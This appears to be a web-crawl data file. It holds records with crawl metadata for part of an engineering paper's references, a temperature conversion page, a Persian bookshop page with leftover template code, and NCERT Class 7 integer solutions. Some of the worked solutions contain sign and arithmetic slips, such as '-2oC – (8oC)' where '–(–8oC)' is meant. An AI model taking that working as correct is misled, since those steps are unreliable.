17(3), 684–690.\n\n17. Rahmati, A., & Adhami, R. (2014). A fault detection and classification technique based on sequential components. IEEE Transactions on Industry Applications, 50(6), 4202–4209.\n\n18. Esmaeilian, A., & Kezunovic, M. (2014). Transmission-line fault analysis using synchronized sampling. IEEE Transactions on Power Delivery, 29(2), 942–950.\n\n19. Butler, K. L., Momoh, J. (1993). Detection and classification of line faults on power distribution systems using neural networks. IEEE Proceedings of the 36th Midwest Symposium, In Circuits and Systems. (pp. 368–371).\n\n20. Upendar, J., Gupta, C. P., Singh, G. K. (2008). ANN based power system fault classification. IEEE, In Region 10 Conference (TENCON), November, (pp. 1–6).\n\n21. Tayeb, E. B. M., Rhim, O. A. A. A. (2011). Transmission line faults detection, classification and location using artificial neural network. IEEE, international conference, utility exhibition on power and energy systems: Issues & prospects for Asia (ICUE), September.\n\n22. Mahanty, R. N., & Gupta, P. D. (2007). A fuzzy logic based fault classification approach using current samples only. Journal of Electric power systems research, 77(5), 501–507.\n\n23. Reddy, M. J., & Mohanta, D. K. (2007). A wavelet-fuzzy combined approach for classification and location of transmission line faults. International Journal of Electrical Power & Energy Systems, 29(9), 669–678.\n\n24. Shahid, N., Aleem, S. A., Naqvi, I. H., Zaffar, N. (2012). Support vector machine based fault detection & classification in smart grids. IEEE, In Globecom Workshops (GC Wkshps), December, (pp. 1526–1531).\n\n25. Livani, H., Evrenosoğlu, C. Y. (2012). A fault classification method in power systems using DWT and SVM classifier. IEEE PES, In Transmission and Distribution Conference and Exposition (T&D), May, 1–5.\n\n26. Moravej, Z., Pazoki, M., & Khederzadeh, M. (2015). New pattern-recognition method for fault analysis in transmission line with UPFC. IEEE Transactions on Power Delivery, 30(3), 1231–1242.\n\n27. Swetapadma, A., & Yadav, A. (2015). Data-mining-based fault during power swing identification in power transmission system. Journal of IET Science, Measurement & Technology, 10(2), 130–139.\n\n28. Masoud, M. E., & Mahfouz, M. M. A. (2010). Protection scheme for transmission lines based on alienation coefficients for current signals. IET Journal of Generation, transmission & distribution, 4(11), 1236–1244.\n\n29. Samet, H., Shabanpour-Haghighi, A., & Ghanbari, T. (2017). A fault classification technique for transmission lines using an improved alienation coefficients technique. doi:10.1002/etep.2235. http://onlinelibrary.wiley.com/doi/10.1002/etep.2235/abstract.\n\n## Author information\n\nAuthors\n\n### Contributions\n\nAll authors read and approved the final manuscript.\n\n### Corresponding author\n\nCorrespondence to Haidar Samet.\n\n## Ethics declarations\n\n### Competing interests\n\nThe authors declare that they have no competing interests.\n\n## Rights and permissions\n\nOpen Access This article is distributed under the terms of the Creative Commons Attribution 4.0 International License (http://creativecommons.org/licenses/by/4.0/), which permits unrestricted use, distribution, and reproduction in any medium, provided you give appropriate credit to the original author(s) and the source, provide a link to the Creative Commons license, and indicate if changes were made.\n\nReprints and Permissions", null, "" ]
[ null, "https://pcmp.springeropen.com/track/article/10.1186/s41601-017-0063-z", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.89378285,"math_prob":0.90991884,"size":27085,"snap":"2022-40-2023-06","text_gpt3_token_len":6061,"char_repetition_ratio":0.16192164,"word_repetition_ratio":0.054410353,"special_character_ratio":0.23263799,"punctuation_ratio":0.1725057,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.97535944,"pos_list":[0,1,2],"im_url_duplicate_count":[null,5,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2022-10-01T15:02:22Z\",\"WARC-Record-ID\":\"<urn:uuid:02046cab-3c19-4213-99d0-feeb225e5d2a>\",\"Content-Length\":\"273939\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:abaefec2-ecae-44ac-8318-a9d51ba37894>\",\"WARC-Concurrent-To\":\"<urn:uuid:18d4e469-91ba-425f-ac22-b97d9396c7c8>\",\"WARC-IP-Address\":\"146.75.36.95\",\"WARC-Target-URI\":\"https://pcmp.springeropen.com/articles/10.1186/s41601-017-0063-z\",\"WARC-Payload-Digest\":\"sha1:MQXN7I2AEAE4QI5PQWHFVUZJZ2JFKUBG\",\"WARC-Block-Digest\":\"sha1:527KXSKLXL4UNXUVUL4NBLMUG2DWLZ5D\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2022/CC-MAIN-2022-40/CC-MAIN-2022-40_segments_1664030336674.94_warc_CC-MAIN-20221001132802-20221001162802-00131.warc.gz\"}"}
https://www.vacations.info/metric/f-to-c.php?f=390
[ "#### Convert 390 degrees Fahrenheit to Celsius\n\n##### 390 degrees Fahrenheit = 198.89 degrees Celsius\n Use this calculator to convert 390°f to Celsius. How many degrees Celsius in 390°f? 390°f to degrees Celsius is 198.89°c. How hot is 390°f in Celsius? How cold? Type the information into the input boxes and the degrees in Celsius will update automatically. Once again, 390°f in Celsius is equal to 198.89°c. Some units are rounded.\n\n#### Fahrenheit to Celsius Conversions\n\nFahrenheit\nCelsius\nHow much is 390 in Fahrenheit to Celsius?\n390 degrees in Fahrenheit is 198.88888888889 degrees in Celsius" ]
[ null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.7804492,"math_prob":0.8338093,"size":333,"snap":"2019-13-2019-22","text_gpt3_token_len":91,"char_repetition_ratio":0.19148937,"word_repetition_ratio":0.0,"special_character_ratio":0.3003003,"punctuation_ratio":0.14473684,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9916221,"pos_list":[0],"im_url_duplicate_count":[null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2019-03-24T02:47:08Z\",\"WARC-Record-ID\":\"<urn:uuid:0216e469-0482-4f8d-97ac-f2f9188bf3a6>\",\"Content-Length\":\"5022\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:eeee9bb4-d5bd-4d8c-a97f-02259f3fcd32>\",\"WARC-Concurrent-To\":\"<urn:uuid:d8bad522-3fba-4787-8974-62b86a55bedc>\",\"WARC-IP-Address\":\"34.229.141.192\",\"WARC-Target-URI\":\"https://www.vacations.info/metric/f-to-c.php?f=390\",\"WARC-Payload-Digest\":\"sha1:7IENF446VDVEHN3W7HJM35REEY2HUO2W\",\"WARC-Block-Digest\":\"sha1:GJ4ZAH324CW7LVPZFTHJUGIARFVCJJHG\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2019/CC-MAIN-2019-13/CC-MAIN-2019-13_segments_1552912203168.70_warc_CC-MAIN-20190324022143-20190324044143-00275.warc.gz\"}"}
https://e-baketabam.ir/shop/history-geography/P2042-brothers-in-arms-one-legendary-tank-regiment-s-bloody-war-from-d-day-to-ve-day-james-holland.html
[ "", null, "۰\nسبد خرید", null, "هر روز با کتاب‌های بیشتر", null, "# Brothers in Arms: One Legendary Tank Regiment’s Bloody War From D-Day to VE-Day | James Holland\n\nکد محصول: eSHB-1969\n۴۰,۷۸۰ تومان۲۰,۳۹۰ تومان", null, "", null, "", null, "افزودن به سبد خرید\n• درباره کتاب\n• مطالعه راحت\n• بخشی از کتاب\n• نظرات\n•", null, "• ## تخفیف ویژه | اولین سفارش\n\n<% if (product.thumbnail) { %>", null, "<% } %>\n\n### <%- product.title %>\n\n<% if (Array.isArray(product.attributes)) { %>\n<% _.forEach(product.attributes, function(attribute, index) { %>\n• <%- attribute.name %>: <%- attribute.value %>\n• <% }); %>\n<% } %><% if (product.price_label) { %>\n<%- (product.price_label.toString()) %>\n<% } else { %><% if (product.in_stock == 1) { %>\n<% if (product.sale_price) { %><%- (product.price.toString().formatNumber().convertToLocalNumber() + currency_sign) %><%- (product.sale_price.toString().formatNumber().convertToLocalNumber() + currency_sign) %><% } else { %><%- (product.price.toString().formatNumber().convertToLocalNumber() + currency_sign) %><% } %>\n<% } else { %>\nاتمام موجودی\n<% } %><% } %>\n<% if (product.ribbon) { %>\n<%- product.ribbon %>\n<% } %><% if (product.sale_amount) { %><% if (product.in_stock==1) { %>\n<% if (product.sale_type==2) { %> <%- ((product.sale_amount).toString().formatNumber().convertToLocalNumber() + currency_sign) %><% } else { %> <%- (product.sale_amount.toString().formatNumber().convertToLocalNumber()) %> درصد <% } %>\n<% } %><% } %>", null, "رمز عبورتان را فراموش کرده‌اید؟\n\nثبت کلمه عبور خود را فراموش کرده‌اید؟ لطفا شماره همراه یا آدرس ایمیل خودتان را وارد کنید. شما به زودی یک ایمیل یا اس ام اس برای ایجاد کلمه عبور جدید، دریافت خواهید کرد.\n\nبازگشت به بخش ورود\n\nکد دریافتی را وارد نمایید.\n\nبازگشت به بخش ورود\n\n### مشاهده سفارش\n\n<%- order.customer_name.toString() %>\n<%- order.id.toString().convertToLocalNumber() %>\n<%- order.customer_province.toString() %>-<%- order.customer_city.toString() %>-<%- order.customer_address.toString() %>\n<%- order.customer_mobile.toString().convertToLocalNumber() %>\n<%- order.shipping_name.toString() %>\n<%- (Number(order.total_shipping).toString().formatNumber().convertToLocalNumber() + currency_sign) %>\n<%- order.payment_method_name.toString() %>\n<%- (Number(order.total).toString().formatNumber().convertToLocalNumber() + currency_sign) %>\n<% if(order.tracking_number) { %>\n<%- order.tracking_number.toString() %>\n<% } %>\nنام محصول\nتعداد\nقیمت واحد\nقیمت کل\nتخفیف\nقیمت نهایی\n<% \\$.each(products, function(index,product) { %>", null, "<%- product.name %>\n<%- product.quantity %>\n<%- (Number(product.original_price).toString().formatNumber().convertToLocalNumber() + currency_sign) %>\n<%- (Number(product.original_price*product.quantity).toString().formatNumber().convertToLocalNumber() + currency_sign) %>\n<%- (Number(product.discount).toString().formatNumber().convertToLocalNumber() + currency_sign) %>\n<%- (Number(product.total).toString().formatNumber().convertToLocalNumber() + currency_sign) %>\n<% }); %>\n<% if(!orders.length) { %>\n\nشما هنوز هیچ سفارشی ثبت نکرده‌اید.\n\n<% } else { %>\n• شماره سفارش\nتاریخ سفارش\nپرداخت\nوضعیت\nجمع نهایی\n• <% \\$.each(orders, function(index,order) { %>\n• <%- order.id.toString().convertToLocalNumber() %>" ]
[ null, "https://e-baketabam.ir/uploads/83433fff0fed4ca4ba52b5bd170c3ae6.w_25,h_25,r_k.png", null, "https://e-baketabam.ir/uploads/99028db945bf4bf7a2c8b65ad16c749d.w_210,h_105,r_k.png", null, "https://e-baketabam.ir/uploads/437304dddcf34502861d4e6526b672fe.w_30,h_30,r_k.png", null, "https://e-baketabam.ir/uploads/b796015d438543f18f71c21366dfa1ac.png", null, "https://e-baketabam.ir/uploads/d1fd020fc36742e69af0263a5f7ce165.png", null, "https://e-baketabam.ir/uploads/00c7c4f7d86249c5b10ba3f2828fb326.png", null, "https://e-baketabam.ir/uploads/cfbae728cc5041e29885ebb5b58f52ef.w_1170,h_2071,r_k.png", null, "https://e-baketabam.ir/shop/history-geography/<%- (product.thumbnail.toString().thumb(748, 90)) %>", null, "https://e-baketabam.ir/uploads/339129f1b95741988d4adbdc26e692ab.w_90,h_30,r_k.png", null, "https://e-baketabam.ir/shop/history-geography/<%- product.thumbnail %>", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.67309994,"math_prob":0.93426526,"size":9259,"snap":"2022-40-2023-06","text_gpt3_token_len":2721,"char_repetition_ratio":0.103187464,"word_repetition_ratio":0.0025923525,"special_character_ratio":0.21060589,"punctuation_ratio":0.10362998,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.9695046,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,2,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2023-01-27T02:28:32Z\",\"WARC-Record-ID\":\"<urn:uuid:cdc55b44-dfed-4387-83e0-5ff498351ddd>\",\"Content-Length\":\"103644\",\"Content-Type\":\"application/http; msgtype=response\",\"WARC-Warcinfo-ID\":\"<urn:uuid:c33ffdda-a555-43c7-905e-6e901ac7afc7>\",\"WARC-Concurrent-To\":\"<urn:uuid:ceacc1bb-94f9-4aa9-a811-eb594895a18c>\",\"WARC-IP-Address\":\"94.182.110.236\",\"WARC-Target-URI\":\"https://e-baketabam.ir/shop/history-geography/P2042-brothers-in-arms-one-legendary-tank-regiment-s-bloody-war-from-d-day-to-ve-day-james-holland.html\",\"WARC-Payload-Digest\":\"sha1:KLVUIURNM6F2DYEVBMWL23SMX42QEKIP\",\"WARC-Block-Digest\":\"sha1:EBXECYN42HOEVGNG7HELKYTFE364C66J\",\"WARC-Identified-Payload-Type\":\"text/html\",\"warc_filename\":\"/cc_download/warc_2023/CC-MAIN-2023-06/CC-MAIN-2023-06_segments_1674764494852.95_warc_CC-MAIN-20230127001911-20230127031911-00525.warc.gz\"}"}
https://byjus.com/ncert-solutions-for-class-7-maths-chapter-1-integers-ex-1-1/
[ "", null, "# NCERT Solutions for Class 7 Maths Exercise 1.1 Chapter 1 Integers\n\nNCERT Solutions for Class 7 Maths Exercise 1.1 Chapter 1 Integers in simple PDF are given here. This exercise of NCERT Solutions for Class 7 Chapter 1 contains topics related to the introduction of integers. We know that integers form a bigger collection of numbers, which includes whole numbers and negative numbers. Our expert teachers have formulated these solutions in precise, comprehensive and in a detailed form. Learn more about these topics by solving the questions of NCERT Solutions for Class 7 Maths Chapter 1 Integers with the help of solutions provided here.\n\n## Download the PDF of NCERT Solutions For Class 7 Maths Chapter 1 Integers – Exercise 1.1", null, "", null, "", null, "", null, "", null, "", null, "", null, "", null, "", null, "", null, "", null, "### Access answers to Maths NCERT Solutions for Class 7 Chapter 1 – Integers Exercise 1.1\n\n1. Following number line shows the temperature in degree celsius (co) at different places on a particular day.", null, "(a) Observe this number line and write the temperature of the places marked on it.\n\nSolution:-\n\nBy observing the number line, we can find the temperature of the cities as follows,\n\nTemperature at the Lahulspiti is -8oC\n\nTemperature at the Srinagar is -2oC\n\nTemperature at the Shimla is 5oC\n\nTemperature at the Ooty is 14oC\n\nTemperature at the Bengaluru is 22oC\n\n(b) What is the temperature difference between the hottest and the coldest places among the above?\n\nSolution:-\n\nFrom the number line we observe that,\n\nThe temperature at the hottest place i.e., Bengaluru is 22oC\n\nThe temperature at the coldest place i.e., Lahulspiti is -8oC\n\nTemperature difference between hottest and coldest place is = 22oC – (-8oC)\n\n= 22oC + 8oC\n\n= 30oC\n\nHence, the temperature difference between the hottest and the coldest place is 30oC.\n\n(c) What is the temperature difference between Lahulspiti and Srinagar?\n\nSolution:-\n\nFrom the given number line,\n\nThe temperature at the Lahulspiti is -8oC\n\nThe temperature at the Srinagar is -2oC\n\n∴The temperature difference between Lahulspiti and Srinagar is = -2oC – (8oC)\n\n= – 2OC + 8oC\n\n= 6oC\n\n(d) Can we say temperature of Srinagar and Shimla taken together is less than the\n\ntemperature at Shimla? Is it also less than the temperature at Srinagar?\n\nSolution:-\n\nFrom the given number line,\n\nThe temperature at Srinagar =-2oC\n\nThe temperature at Shimla = 5oC\n\nThe temperature of Srinagar and Shimla taken together is = – 2oC + 5oC\n\n= 3oC\n\n∴ 5oC > 3oC\n\nSo, the temperature of Srinagar and Shimla taken together is less than the temperature at Shimla.\n\nThen,\n\n3o > -2o\n\nNo, the temperature of Srinagar and Shimla taken together is not less than the temperature of Srinagar.\n\n2. In a quiz, positive marks are given for correct answers and negative marks are given\n\nfor incorrect answers. If Jack’s scores in five successive rounds were 25, – 5, – 10,\n\n15 and 10, what was his total at the end?\n\nSolution:-\n\nFrom the question,\n\nJack’s score in five successive rounds are 25, -5, -10, 15 and 10\n\nThe total score of Jack at the end will be = 25 + (-5) + (-10) + 15 + 10\n\n= 25 – 5 – 10 + 15 + 10\n\n= 50 – 15\n\n= 35\n\n∴Jack’s total score at the end is 35.\n\n3. At Srinagar temperature was – 5°C on Monday and then it dropped by 2°C on Tuesday. What was the temperature of Srinagar on Tuesday? On Wednesday, it rose by 4°C. What was the temperature on this day?\n\nSolution:-\n\nFrom the question,\n\nTemperature on Monday at Srinagar = -5oC\n\nTemperature on Tuesday at Srinagar is dropped by 2oC = Temperature on Monday – 2oC\n\n= -5oC – 2oC\n\n= -7oC\n\nTemperature on Wednesday at Srinagar is rose by 4oC = Temperature on Tuesday + 4oC\n\n= -7oC + 4oC\n\n= -3oC\n\nThus, the temperature on Tuesday and Wednesday was -7oC and -3oC respectively.\n\n4. A plane is flying at the height of 5000 m above the sea level. At a particular point, it is exactly above a submarine floating 1200 m below the sea level. What is the vertical distance between them?", null, "Solution:-\n\nFrom the question,\n\nPlane is flying at the height = 5000 m\n\nDepth of Submarine = -1200 m\n\nThe vertical distance between plane and submarine = 5000 m – (- 1200) m\n\n= 5000 m + 1200 m\n\n= 6200 m\n\n5. Mohan deposits ₹ 2,000 in his bank account and withdraws ₹ 1,642 from it, the next day. If withdrawal of amount from the account is represented by a negative integer, then how will you represent the amount deposited? Find the balance in Mohan’s account after the withdrawal.\n\nSolution:-\n\nWithdrawal of amount from the account is represented by a negative integer.\n\nThen, deposit of amount to the account is represented by a positive integer.\n\nFrom the question,\n\nTotal amount deposited in bank account by the Mohan = ₹ 2000\n\nTotal amount withdrawn from the bank account by the Mohan = – ₹ 1642\n\nBalance in Mohan’s account after the withdrawal = amount deposited + amount withdrawn\n\n= ₹ 2000 + (-₹ 1642)\n\n= ₹ 2000 – ₹ 1642\n\n= ₹ 358\n\nHence, the balance in Mohan’s account after the withdrawal is ₹ 358\n\n6. Rita goes 20 km towards east from a point A to the point B. From B, she moves 30 km towards west along the same road. If the distance towards east is represented by a positive integer then, how will you represent the distance travelled towards west? By which integer will you represent her final position from A?", null, "Solution:-\n\nFrom the question, it is given that\n\nA positive integer represents the distance towards the east.\n\nThen, distance travelled towards the west will be represented by a negative integer.\n\nRita travels a distance in east direction = 20 km\n\nRita travels a distance in west direction = – 30 km\n\n∴Distance travelled from A = 20 + (- 30)\n\n= 20 – 30\n\n= -10 km\n\nHence, we will represent the distance travelled by Rita from point A by a negative integer, i.e. – 10 km\n\n7. In a magic square each row, column and diagonal have the same sum. Check which of the following is a magic square.", null, "Solution:-\n\nFirst we consider the square (i)\n\nBy adding the numbers in each rows we get,\n\n= 5 + (- 1) + (- 4) = 5 – 1 – 4 = 5 – 5 = 0\n\n= -5 + (-2) + 7 = – 5 – 2 + 7 = -7 + 7 = 0\n\n= 0 + 3 + (-3) = 3 – 3 = 0\n\nBy adding the numbers in each columns we get,\n\n= 5 + (- 5) + 0 = 5 – 5 = 0\n\n= (-1) + (-2) + 3 = -1 – 2 + 3 = -3 + 3 = 0\n\n= -4 + 7 + (-3) = -4 + 7 – 3 = -7 + 7 = 0\n\nBy adding the numbers in diagonals we get,\n\n= 5 + (-2) + (-3) = 5 – 2 – 3 = 5 – 5 = 0\n\n= -4 + (-2) + 0 = – 4 – 2 = -6\n\nBecause sum of one diagonal is not equal to zero,\n\nSo, (i) is not a magic square\n\nNow, we consider the square (ii)\n\nBy adding the numbers in each rows we get,\n\n= 1 + (-10) + 0 = 1 – 10 + 0 = -9\n\n= (-4) + (-3) + (-2) = -4 – 3 – 2 = -9\n\n= (-6) + 4 + (-7) = -6 + 4 – 7 = -13 + 4 = -9\n\nBy adding the numbers in each columns we get,\n\n= 1 + (-4) + (-6) = 1 – 4 – 6 = 1 – 10 = -9\n\n= (-10) + (-3) + 4 = -10 – 3 + 4 = -13 + 4\n\n= 0 + (-2) + (-7) = 0 – 2 – 7 = -9\n\nBy adding the numbers in diagonals we get,\n\n= 1 + (-3) + (-7) = 1 – 3 – 7 = 1 – 10 = -9\n\n= 0 + (-3) + (-6) = 0 – 3 – 6 = -9\n\nThis (ii) square is a magic square, because sum of each row, each column and diagonal is equal to -9.\n\n8. Verify a – (– b) = a + b for the following values of a and b.\n\n(i) a = 21, b = 18\n\nSolution:-\n\nFrom the question,\n\na = 21 and b = 18\n\nTo verify a – (- b) = a + b\n\nLet us take Left Hand Side (LHS) = a – (- b)\n\n= 21 – (- 18)\n\n= 21 + 18\n\n= 39\n\nNow, Right Hand Side (RHS) = a + b\n\n= 21 + 18\n\n= 39\n\nBy comparing LHS and RHS\n\nLHS = RHS\n\n39 = 39\n\nHence, the value of a and b is verified.\n\n(ii) a = 118, b = 125\n\nSolution:-\n\nFrom the question,\n\na = 118 and b = 125\n\nTo verify a – (- b) = a + b\n\nLet us take Left Hand Side (LHS) = a – (- b)\n\n= 118 – (- 125)\n\n= 118 + 125\n\n= 243\n\nNow, Right Hand Side (RHS) = a + b\n\n= 118 + 125\n\n= 243\n\nBy comparing LHS and RHS\n\nLHS = RHS\n\n243 = 243\n\nHence, the value of a and b is verified.\n\n(iii) a = 75, b = 84\n\nSolution:-\n\nFrom the question,\n\na = 75 and b = 84\n\nTo verify a – (- b) = a + b\n\nLet us take Left Hand Side (LHS) = a – (- b)\n\n= 75 – (- 84)\n\n= 75 + 84\n\n= 159\n\nNow, Right Hand Side (RHS) = a + b\n\n= 75 + 84\n\n= 159\n\nBy comparing LHS and RHS\n\nLHS = RHS\n\n159 = 159\n\nHence, the value of a and b is verified.\n\n(iv) a = 28, b = 11\n\nSolution:-\n\nFrom the question,\n\na = 28 and b = 11\n\nTo verify a – (- b) = a + b\n\nLet us take Left Hand Side (LHS) = a – (- b)\n\n= 28 – (- 11)\n\n= 28 + 11\n\n= 39\n\nNow, Right Hand Side (RHS) = a + b\n\n= 28 + 11\n\n= 39\n\nBy comparing LHS and RHS\n\nLHS = RHS\n\n39 = 39\n\nHence, the value of a and b is verified.\n\n9. Use the sign of >, < or = in the box to make the statements true.\n\n(a) (-8) + (-4) [ ] (-8) – (-4)\n\nSolution:-\n\nLet us take Left Hand Side (LHS) = (-8) + (-4)\n\n= -8 – 4\n\n= -12\n\nNow, Right Hand Side (RHS) = (-8) – (-4)\n\n= -8 + 4\n\n= -4\n\nBy comparing LHS and RHS\n\nLHS < RHS\n\n-12 < -4\n\n∴ (-8) + (-4) [<] (-8) – (-4)\n\n(b) (-3) + 7 – (19) [ ] 15 – 8 + (-9)\n\nSolution:-\n\nLet us take Left Hand Side (LHS) = (-3) + 7 – 19\n\n= -3 + 7 – 19\n\n= -22 + 7\n\n= -15\n\nNow, Right Hand Side (RHS) = 15 – 8 + (-9)\n\n= 15 – 8 – 9\n\n= 15 – 17\n\n= -2\n\nBy comparing LHS and RHS\n\nLHS < RHS\n\n-15 < -2\n\n∴ (-3) + 7 – (19) [<] 15 – 8 + (-9)\n\n(c) 23 – 41 + 11 [ ] 23 – 41 – 11\n\nSolution:-\n\nLet us take Left Hand Side (LHS) = 23 – 41 + 11\n\n= 34 – 41\n\n= – 7\n\nNow, Right Hand Side (RHS) = 23 – 41 – 11\n\n= 23 – 52\n\n= – 29\n\nBy comparing LHS and RHS\n\nLHS > RHS\n\n– 7 > -29\n\n∴ 23 – 41 + 11 [>] 23 – 41 – 11\n\n(d) 39 + (-24) – (15) [ ] 36 + (-52) – (- 36)\n\nSolution:-\n\nLet us take Left Hand Side (LHS) = 39 + (-24) – 15\n\n= 39 – 24 – 15\n\n= 39 – 39\n\n= 0\n\nNow, Right Hand Side (RHS) = 36 + (-52) – (- 36)\n\n= 36 – 52 + 36\n\n= 72 – 52\n\n= 20\n\nBy comparing LHS and RHS\n\nLHS < RHS\n\n0 < 20\n\n∴ 39 + (-24) – (15) [<] 36 + (-52) – (- 36)\n\n(e) – 231 + 79 + 51 [ ] -399 + 159 + 81\n\nSolution:-\n\nLet us take Left Hand Side (LHS) = – 231 + 79 + 51\n\n= – 231 + 130\n\n= -101\n\nNow, Right Hand Side (RHS) = – 399 + 159 + 81\n\n= – 399 + 240\n\n= – 159\n\nBy comparing LHS and RHS\n\nLHS > RHS\n\n-101 > -159\n\n∴ – 231 + 79 + 51 [>] -399 + 159 + 81\n\n10. A water tank has steps inside it. A monkey is sitting on the topmost step (i.e., the first step). The water level is at the ninth step.", null, "(i) He jumps 3 steps down and then jumps back 2 steps up. In how many jumps will he reach the water level?\n\nSolution:-\n\nLet us consider steps moved down are represented by positive integers and then, steps moved up are represented by negative integers.\n\nInitially monkey is sitting on the top most step i.e., first step\n\nIn 1st jump monkey will be at step = 1 + 3 = 4 steps\n\nIn 2nd jump monkey will be at step = 4 + (-2) = 4 – 2 = 2 steps\n\nIn 3rd jump monkey will be at step = 2 + 3 = 5 steps\n\nIn 4th jump monkey will be at step = 5 + (-2) = 5 – 2 = 3 steps\n\nIn 5th jump monkey will be at step = 3 + 3 = 6 steps\n\nIn 6th jump monkey will be at step = 6 + (-2) = 6 – 2 = 4 steps\n\nIn 7th jump monkey will be at step = 4 + 3 = 7 steps\n\nIn 8th jump monkey will be at step = 7 + (-2) = 7 – 2 = 5 steps\n\nIn 9th jump monkey will be at step = 5 + 3 = 8 steps\n\nIn 10th jump monkey will be at step = 8 + (-2) = 8 – 2 = 6 steps\n\nIn 11th jump monkey will be at step = 6 + 3 = 9 steps\n\n∴Monkey took 11 jumps (i.e., 9th step) to reach the water level\n\n(ii) After drinking water, he wants to go back. For this, he jumps 4 steps up and then jumps back 2 steps down in every move. In how many jumps will he reach back the top step?\n\nSolution:-\n\nLet us consider steps moved down are represented by positive integers and then, steps moved up are represented by negative integers.\n\nInitially monkey is sitting on the ninth step i.e., at the water level\n\nIn 1st jump monkey will be at step = 9 + (-4) = 9 – 4 = 5 steps\n\nIn 2nd jump monkey will be at step = 5 + 2 = 7 steps\n\nIn 3rd jump monkey will be at step = 7 + (-4) = 7 – 4 = 3 steps\n\nIn 4th jump monkey will be at step = 3 + 2 = 5 steps\n\nIn 5th jump monkey will be at step = 5 + (-4) = 5 – 4 = 1 step\n\n∴Monkey took 5 jumps to reach back the top step i.e., first step.\n\n(iii) If the number of steps moved down is represented by negative integers and the number of steps moved up by positive integers, represent his moves in part (i) and (ii) by completing the following; (a) – 3 + 2 – … = – 8 (b) 4 – 2 + … = 8. In (a) the sum (– 8) represents going down by eight steps. So, what will the sum 8 in (b) represent?\n\nSolution:-\n\nFrom the question, it is given that\n\nIf the number of steps moved down is represented by negative integers and the number of steps moved up by positive integers.\n\nMonkey moves in part (i)\n\n= – 3 + 2 – ……….. = – 8\n\nThen LHS = – 3 + 2 – 3 + 2 – 3 + 2 – 3 + 2 – 3 + 2 – 3\n\n= – 18 + 10\n\n= – 8\n\nRHS = -8\n\n∴Moves in part (i) represents monkey is going down 8 steps. Because negative integer.\n\nNow,\n\nMonkey moves in part (ii)\n\n= 4 – 2 + ……….. = 8\n\nThen LHS = 4 – 2 + 4 – 2 + 4\n\n= 12 – 4\n\n= 8\n\nRHS = 8\n\n∴Moves in part (ii) represents monkey is going up 8 steps. Because positive integer.\n\n### Access other exercises of NCERT Solutions For Class 7 Chapter 1 – Integers\n\nExercise 1.2 Solutions\n\nExercise 1.3 Solutions\n\nExercise 1.4 Solutions" ]
[ null, "https://www.facebook.com/tr", null, "data:image/png;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=", null, "data:image/png;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=", null, "data:image/png;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=", null, "data:image/png;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=", null, "data:image/png;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=", null, "data:image/png;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=", null, "data:image/png;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=", null, "data:image/png;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=", null, "data:image/png;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=", null, "data:image/png;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=", null, "data:image/png;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=", null, "data:image/png;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=", null, "data:image/png;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=", null, "data:image/png;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=", null, "data:image/png;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=", null, "data:image/png;base64,R0lGODlhAQABAAD/ACwAAAAAAQABAAACADs=", null ]
{"ft_lang_label":"__label__en","ft_lang_prob":0.8873693,"math_prob":0.9993771,"size":12308,"snap":"2019-51-2020-05","text_gpt3_token_len":4257,"char_repetition_ratio":0.14011703,"word_repetition_ratio":0.2440666,"special_character_ratio":0.39852127,"punctuation_ratio":0.083704,"nsfw_num_words":0,"has_unicode_error":false,"math_prob_llama3":0.99987125,"pos_list":[0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34],"im_url_duplicate_count":[null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null],"WARC_HEADER":"{\"WARC-Type\":\"response\",\"WARC-Date\":\"2020-01-21T13:35:41Z\",\"WARC-Record-ID\":\"<urn:uuid:0ea4960f-d418-4bfa-8cfb-600a7c661476>\",\"Content-Length\":\"577831\",\"Content-Type\":\"application/http; 